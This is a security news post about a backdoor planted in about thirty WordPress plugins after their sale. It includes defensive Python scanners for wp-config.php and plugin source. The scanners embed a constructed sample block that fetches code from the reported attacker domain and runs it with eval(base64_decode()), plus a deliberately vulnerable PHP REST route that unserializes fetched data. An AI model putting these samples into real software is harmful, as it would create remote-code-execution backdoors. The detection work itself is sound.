Someone bought 30 WordPress plugins and planted a backdoor in all of them

April 13, 2026
Photo by Szymon Shields on Pexels

What happened

A trusted WordPress plugin portfolio was weaponized. It has been reported that more than 30 plugins from the “Essential Plugin” family were compromised after a change of ownership, and the WordPress.org Plugins Team closed 31 plugins once the compromise was discovered. The trigger was an alert in a client’s wp-admin dashboard for Countdown Timer Ultimate: a routine security notice that led to a full audit and to the discovery of a backdoor hiding in wp-config.php. Trust, destroyed in one update. Ouch.

How the malware worked

The malicious module, wpos-analytics, allegedly phoned home to analytics.essentialplugin.com and downloaded a file named wp-comments-posts.php, a name chosen to pass as WordPress core’s wp-comments-post.php. That file injected a large PHP payload into wp-config.php, which served SEO spam and redirects only when the visitor was Googlebot, so site owners and ordinary users saw nothing. The campaign was clever: the backdoor resolved its command-and-control domain via an Ethereum smart contract, so taking down ordinary DNS records or hosting wouldn’t be enough. WordPress.org pushed a forced plugin update (v2.6.9.1) that neutralized the phone-home code, but the payload already injected into wp-config.php remained in place and active.
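Because the forced update cleans the plugin but not wp-config.php, the file itself has to be checked. The scanner below is an added example, not code from the original post or from the plugin authors: it reports, line by line, the traits the post attributes to the injected payload (user-agent cloaking for Googlebot, decode-and-execute strings, a fetch-then-unserialize chain, and the domain and lookalike file name named in the report). The indicator list, the two sample configs and the reporting format are my assumptions; only the domain and file name come from the post.

```python
"""Triage a wp-config.php for the kind of injected payload described above.
Added example, not code from the original post or from the plugin authors.
The indicator list and the sample files are assumptions; the domain and the
lookalike file name come from the report."""
import re
from typing import List, NamedTuple


class Finding(NamedTuple):
    line_no: int
    indicator: str
    text: str


# Per-line indicators. A legitimate wp-config.php holds constants, the table
# prefix and the wp-settings.php require; it has no reason to inspect the
# visitor's user agent or to decode and execute strings.
LINE_INDICATORS = [
    ("search-engine cloaking",
     re.compile(r"HTTP_USER_AGENT|googlebot|bingbot", re.I)),
    ("obfuscated execution",
     re.compile(r"\b(eval|assert|create_function)\s*\(", re.I)),
    ("encoded payload",
     re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("known campaign indicator (named in the report)",
     re.compile(r"wpos-analytics|essentialplugin\.com|wp-comments-posts\.php", re.I)),
]
FETCH = re.compile(r"\b(file_get_contents|curl_exec|wp_remote_(get|post))\s*\(", re.I)
UNSERIALIZE = re.compile(r"\bunserialize\s*\(", re.I)


def scan_wp_config(text: str) -> List[Finding]:
    """Return every indicator hit, in file order, with its line number."""
    findings: List[Finding] = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, rx in LINE_INDICATORS:
            if rx.search(line):
                findings.append(Finding(n, name, line.strip()))
        # The fetch-then-unserialize chain is reported on the unserialize line,
        # whether the fetch sits on the same line or elsewhere in the file.
        if UNSERIALIZE.search(line) and FETCH.search(text):
            findings.append(Finding(n, "remote fetch + unserialize", line.strip()))
    return findings


def looks_injected(text: str) -> bool:
    """Any hit is reason to diff the file against a pre-compromise backup."""
    return bool(scan_wp_config(text))


# Constructed samples. CLEAN_CONFIG is a stock-style config; INJECTED_CONFIG
# adds an inert block, shaped like the report's description, before the marker.
CLEAN_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wp' );
define( 'DB_PASSWORD', 'example-only' );
define( 'DB_HOST', 'localhost' );
$table_prefix = 'wp_';
/* That's all, stop editing! Happy publishing. */
if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';
"""
_INJECTED_BLOCK = """/* constructed sample of an injected block; inert text used only as scanner input */
if ( stripos( $_SERVER['HTTP_USER_AGENT'], 'googlebot' ) !== false ) {
    $wpos = @unserialize( @file_get_contents( 'https://analytics.essentialplugin.com/wp-comments-posts.php' ) );
    eval( base64_decode( $wpos['c'] ) );
}
"""
INJECTED_CONFIG = CLEAN_CONFIG.replace("/* That's all", _INJECTED_BLOCK + "/* That's all")


if __name__ == "__main__":
    for label, cfg in (("clean", CLEAN_CONFIG), ("injected", INJECTED_CONFIG)):
        print(f"{label}: {'suspicious' if looks_injected(cfg) else 'no indicators'}")
        for f in scan_wp_config(cfg):
            print(f"  line {f.line_no}: {f.indicator}: {f.text[:70]}")
```

Run it against a site's real wp-config.php (or a whole backup set) by reading the file into `scan_wp_config`; a single hit on the cloaking or execution indicators is already far outside what a config file should contain, and the line number tells you exactly which block to compare with a backup taken before the change.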

The forensic timeline

Backup forensics pinpointed the injection to a tight window on April 6, 2026, between 04:22 and 11:06 UTC. The malicious payload had been planted roughly eight months earlier but lay dormant until it was activated. The change that introduced the backdoor arrived in version 2.6.7 (Aug 8, 2025): 191 lines added, including a file_get_contents() plus @unserialize() chain, a dynamic execution path that runs an attacker-controlled function, and an unauthenticated REST endpoint (permission_callback: __return_true). In plain English: an attacker-controlled payload could call arbitrary PHP functions with attacker-chosen arguments. That’s textbook remote code execution via deserialization.
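Two of the steps in that timeline can be reproduced by hand: narrowing the change window from a series of dated backups, and recognising the three code defects the post attributes to version 2.6.7 when reviewing plugin source. The block below is an added example, not code from the original post or from the plugin authors. The backup series, the vulnerable and hardened PHP snippets, the pattern list and the route name `wpos/v1` are constructed for illustration; the window function assumes the oldest backup predates the change, which holds here because wp-config.php was only modified on April 6 even though the plugin code had carried the payload since August.

```python
"""Two checks drawn from the forensic timeline above: narrowing the injection
window from dated backups, and spotting the v2.6.7-style code pattern in plugin
source. Added example, not code from the original post or from the plugin
authors; the snapshots, the PHP samples and the pattern list are constructed."""
import hashlib
import re
from datetime import datetime, timezone
from typing import List, NamedTuple, Optional, Tuple


class Snapshot(NamedTuple):
    taken_at: datetime  # backup time, UTC
    content: str        # wp-config.php as stored in that backup


def _digest(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def injection_window(snapshots: List[Snapshot]) -> Tuple[datetime, Optional[datetime]]:
    """Return (last_clean, first_modified). The oldest backup is the clean
    baseline (assumption: it predates the change); last_clean is the latest
    backup still matching it and first_modified the first that differs, or
    None when the file never changed across the series."""
    ordered = sorted(snapshots, key=lambda s: s.taken_at)
    baseline = _digest(ordered[0].content)
    last_clean = ordered[0].taken_at
    for snap in ordered[1:]:
        if _digest(snap.content) != baseline:
            return last_clean, snap.taken_at
        last_clean = snap.taken_at
    return last_clean, None


# The three defects the timeline attributes to v2.6.7, as line-level patterns.
PLUGIN_PATTERNS = [
    ("unauthenticated REST route",
     re.compile(r"permission_callback'?\s*=>\s*'__return_true'")),
    ("unserialize of fetched data",
     re.compile(r"unserialize\s*\(\s*@?\s*(file_get_contents|wp_remote_retrieve_body)\s*\(")),
    ("variable function call",
     re.compile(r"^\s*(return\s+)?\$\w+\s*\(\s*\$\w+")),
]


def audit_plugin_source(php: str) -> List[Tuple[int, str]]:
    """Return (line_no, defect) for each pattern hit in a PHP source string."""
    return [(n, name)
            for n, line in enumerate(php.splitlines(), 1)
            for name, rx in PLUGIN_PATTERNS if rx.search(line)]


def _utc(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M").replace(tzinfo=timezone.utc)


# Constructed backup series; times chosen to mirror the report's window.
CLEAN = "<?php\ndefine( 'DB_NAME', 'wordpress' );\nrequire_once ABSPATH . 'wp-settings.php';\n"
MODIFIED = CLEAN.replace("require_once", "/* constructed: unexpected block */\nrequire_once")
SNAPSHOTS = [
    Snapshot(_utc("2026-04-06 11:06"), MODIFIED),  # listed out of order on purpose
    Snapshot(_utc("2026-04-05 22:00"), CLEAN),
    Snapshot(_utc("2026-04-06 04:22"), CLEAN),
    Snapshot(_utc("2026-04-07 04:20"), MODIFIED),
]

# Constructed PHP: the shape the timeline describes, then a hardened rewrite
# (capability check, fixed origin, JSON instead of PHP serialization, no
# dynamic call). Both are scanner input only.
VULNERABLE_PHP = """register_rest_route( 'wpos/v1', '/sync', array(
    'methods'             => 'POST',
    'callback'            => 'wpos_sync',
    'permission_callback' => '__return_true',
) );
function wpos_sync( $request ) {
    $data = @unserialize( file_get_contents( $request['src'] ) );
    $fn   = $data['f'];
    return $fn( $data['a'] );
}
"""
HARDENED_PHP = """register_rest_route( 'wpos/v1', '/sync', array(
    'methods'             => 'POST',
    'callback'            => 'wpos_sync',
    'permission_callback' => function () { return current_user_can( 'manage_options' ); },
) );
function wpos_sync( WP_REST_Request $request ) {
    $body = wp_remote_retrieve_body( wp_remote_get( 'https://updates.example.invalid/manifest.json' ) );
    $data = json_decode( $body, true );
    if ( ! is_array( $data ) || ! isset( $data['version'] ) ) {
        return new WP_Error( 'bad_manifest', 'Unexpected manifest' );
    }
    return rest_ensure_response( array( 'version' => sanitize_text_field( $data['version'] ) ) );
}
"""


if __name__ == "__main__":
    lo, hi = injection_window(SNAPSHOTS)
    print(f"wp-config.php changed between {lo.isoformat()} and {hi.isoformat()}")
    for label, src in (("vulnerable", VULNERABLE_PHP), ("hardened", HARDENED_PHP)):
        print(label, audit_plugin_source(src) or "no findings")
```

Hash comparison is deliberately strict: any byte-level difference counts as a change, so a backup series that also picks up legitimate edits will need the baseline chosen by hand. The source audit is a first-pass filter for code review, not proof of a backdoor; `__return_true` is legitimate for some public read-only routes, but it has no place on an endpoint that then unserializes data it fetched from elsewhere.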

Sale, scale and what it means

The original plugins were built by a team known as WP Online Support (later Essential Plugin). As revenue fell, the portfolio was listed on Flippa, and it has been reported that a buyer paid six figures for the lot. Whether that buyer is the attacker, or the account was itself hijacked, remains under investigation, but the result is the same: a supply-chain compromise that reached thousands of sites. The emotional sting here is clear: site owners expect plugins to be safe. Lessons? Check wp-config.php for unexpected code, audit plugin ownership changes, restore clean backups dated before the April 6 window, and treat third-party plugin portfolios as high-value attack surfaces. Who’s watching the watchers? Turns out we all should be.

Sources: anchor.host, Hacker News